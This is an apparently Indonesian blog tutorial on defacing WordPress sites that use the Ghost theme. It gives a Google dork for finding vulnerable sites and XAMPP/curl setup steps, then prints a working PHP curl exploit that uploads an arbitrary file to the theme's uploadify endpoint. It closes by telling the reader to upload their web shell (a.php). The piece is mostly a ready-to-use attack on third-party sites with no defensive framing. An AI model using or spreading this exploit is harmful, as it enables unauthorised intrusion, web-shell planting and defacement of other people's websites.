Assalamualaikum , kali ini saya akan share tutorial Deface dengan Teknik Wordpress Ghost Theme File Upload ,
Exploit Aslinya Disini http://1337day.com/exploit/21416
1. Download XAAMP nya Disini HERE
2. Install XAMMP
Google Dork : inurl:wp-content/themes/Ghost/
Jika Sudah terinstall kamu buka PHP.ini , cek di System C > xammp > php > php.ini
Lalu tekan CTRL+F lalu ketikkan curl lalu hapus tanda titik dua koma ( ; )
Sekarang Kamu Copy Kan Exploitnya
<?php$uploadfile="yourFile.php";$ch = curl_init("http://{target}/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php");curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch);print "$postResult";?>
Sekarang , kamu copykan file shell kamu , Disini nama shell saya adalah a.php
